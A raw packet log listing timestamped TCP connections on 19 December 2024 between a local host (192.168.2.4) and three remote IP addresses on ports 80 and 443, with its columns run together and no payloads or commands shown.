                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.510638952 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.511631966 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.511647940 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.511683941 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.512749910 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.512794018 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.512875080 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.512931108 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.513844967 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.513860941 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.513906002 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.513906002 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.514910936 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.515013933 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.515053034 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.516045094 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.516135931 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.516149998 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.516191959 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.517117023 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.517250061 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.517294884 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.518203020 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.518323898 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.518376112 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.519357920 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.519388914 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.519398928 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.519426107 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.520448923 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.520534992 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.520562887 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.520586967 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.530025959 CET4988880192.168.2.4185.215.113.43
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.543848038 CET44349896104.21.66.85192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.598346949 CET49896443192.168.2.4104.21.66.85
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.616679907 CET44349896104.21.66.85192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.626034975 CET44349896104.21.66.85192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.626091957 CET49896443192.168.2.4104.21.66.85
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.626110077 CET44349896104.21.66.85192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.626317024 CET44349896104.21.66.85192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.626502991 CET49896443192.168.2.4104.21.66.85
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.649822950 CET8049888185.215.113.43192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.649884939 CET4988880192.168.2.4185.215.113.43
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.650254965 CET49896443192.168.2.4104.21.66.85
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.650283098 CET44349896104.21.66.85192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:05.037585020 CET49904443192.168.2.4104.21.66.85
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:05.037622929 CET44349904104.21.66.85192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:05.037704945 CET49904443192.168.2.4104.21.66.85
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:05.038033009 CET49904443192.168.2.4104.21.66.85
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:05.038045883 CET44349904104.21.66.85192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:05.796439886 CET4990880192.168.2.4185.215.113.43
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:05.801583052 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:05.915920019 CET8049908185.215.113.43192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:05.916171074 CET4990880192.168.2.4185.215.113.43
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:05.917889118 CET4990880192.168.2.4185.215.113.43
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:05.921353102 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:05.922080994 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:06.037327051 CET8049908185.215.113.43192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:06.258974075 CET44349904104.21.66.85192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:06.259068012 CET49904443192.168.2.4104.21.66.85
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:06.377149105 CET49904443192.168.2.4104.21.66.85
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:06.377202034 CET44349904104.21.66.85192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:06.378104925 CET44349904104.21.66.85192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:06.379920959 CET49904443192.168.2.4104.21.66.85
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:06.382213116 CET49904443192.168.2.4104.21.66.85
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:06.382289886 CET44349904104.21.66.85192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:06.382605076 CET49904443192.168.2.4104.21.66.85
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:06.382621050 CET44349904104.21.66.85192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:07.266859055 CET8049908185.215.113.43192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:07.272104979 CET4990880192.168.2.4185.215.113.43
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:07.423612118 CET44349904104.21.66.85192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:07.423877001 CET44349904104.21.66.85192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:07.423999071 CET49904443192.168.2.4104.21.66.85
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:07.665529966 CET49904443192.168.2.4104.21.66.85
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:07.665566921 CET44349904104.21.66.85192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:07.730154037 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:07.850064993 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:07.850147009 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:07.854460955 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:07.973962069 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:08.031874895 CET49915443192.168.2.4104.21.66.85
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:08.031896114 CET44349915104.21.66.85192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:08.031992912 CET49915443192.168.2.4104.21.66.85
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:08.032466888 CET49915443192.168.2.4104.21.66.85
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:08.032481909 CET44349915104.21.66.85192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.176038027 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.176081896 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.176136017 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.176170111 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.176191092 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.176191092 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.176224947 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.176227093 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.176264048 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.176316023 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.176350117 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.176368952 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.176387072 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.176424026 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.176448107 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.176448107 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.176496029 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.256174088 CET44349915104.21.66.85192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.256259918 CET49915443192.168.2.4104.21.66.85
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.257826090 CET49915443192.168.2.4104.21.66.85
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.257854939 CET44349915104.21.66.85192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.258877993 CET44349915104.21.66.85192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.260437965 CET49915443192.168.2.4104.21.66.85
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.260570049 CET49915443192.168.2.4104.21.66.85
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.260610104 CET44349915104.21.66.85192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.296117067 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.296219110 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.296302080 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.299413919 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.299491882 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.367892027 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.367923021 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.367949963 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.368001938 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.370362997 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.370465040 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.370553970 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.378772974 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.378845930 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.378896952 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.385281086 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.385375977 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.385420084 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.385420084 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.393693924 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.393790960 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.393942118 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.402060032 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.402151108 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.402188063 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.406049967 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.410465002 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.410609961 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.410686016 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.418853998 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.418976068 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.419207096 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.427294016 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.427438021 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.427546978 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.435636044 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.435740948 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.435839891 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.444056034 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.444300890 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.444400072 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.452466011 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.452590942 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.487502098 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.490291119 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.531260014 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.531353951 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.531483889 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.560214043 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.560358047 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.560395002 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.561268091 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.562460899 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.562534094 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.563308954 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.563359022 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.563368082 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.563405037 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.567547083 CET4990880192.168.2.4185.215.113.43
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.568039894 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.568089008 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.568114042 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.568149090 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.572380066 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.572452068 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.572470903 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.572552919 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.577023029 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.577080011 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.577174902 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.581991911 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.582091093 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.582146883 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.582223892 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.586431980 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.586499929 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.586632013 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.586730003 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.591140032 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.591193914 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.591276884 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.591344118 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.595568895 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.595603943 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.595695972 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.601888895 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.601988077 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.602067947 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.602134943 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.604834080 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.604980946 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.605093956 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.609457970 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.609493017 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.609560013 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.609560013 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.613900900 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.614028931 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.614164114 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.618582010 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.618623018 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.618671894 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.618671894 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.623157024 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.623244047 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.623260021 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.623332977 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.628329992 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.628364086 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.628566980 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.630935907 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.631098032 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.631167889 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.634358883 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.634413004 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.634552956 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.638117075 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.638183117 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.638199091 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.638557911 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.641736031 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.642023087 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.642117023 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.645703077 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.646318913 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.687356949 CET8049908185.215.113.43192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.688163996 CET4990880192.168.2.4185.215.113.43
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.723246098 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.723283052 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.723378897 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.725003004 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.725146055 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.752166033 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.752224922 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.752249956 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.752409935 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.753429890 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.753546953 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.753602028 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.753602028 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.756155014 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.756244898 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.757134914 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.757189989 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.757239103 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.757323980 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.759830952 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.759969950 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.760111094 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.760191917 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.762556076 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.762609005 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.762674093 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.765182018 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.765408993 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.765609026 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.767766953 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.767906904 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.768080950 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.770292997 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.770380974 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.770410061 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.772875071 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.772911072 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.772949934 CET4991080192.168.2.431.41.244.11
